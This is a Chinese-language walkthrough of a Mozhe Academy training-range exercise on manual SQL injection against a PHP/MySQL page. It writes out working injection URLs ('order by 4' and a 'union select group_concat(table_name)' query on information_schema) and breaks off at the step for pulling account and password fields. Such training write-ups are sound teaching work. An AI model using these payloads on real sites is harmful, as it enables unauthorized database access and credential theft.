一、链接地址:SQL手工注入漏洞测试(MySQL数据库)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养
二、了解靶场,击败靶场
背景介绍
安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Nginx+PHP+MySQL,PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。
实训目标
1.掌握SQL注入原理;
2.了解手工注入的方法;
3.了解MySQL的数据结构;
4.了解字符串的MD5加解密;
解题方向
手工进行SQL注入测试,获取管理密码登录。
三、解题步骤
1、启动靶场环境
2、点击访问
3、查找到sql注入点在滚动窗口 ,点击打开
4、判断注入类型为数字型注入
5、判断出有4列,因为order by 5时页面无显示http://124.70.64.48:48206/new_list.php?id=1 order by 4 #
6、union select 联合查询判断回显位置
7、接下来查看表名,语句为:http://124.70.64.48:48206/new_list.php?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database() #
8、查询字段,也就是账号密码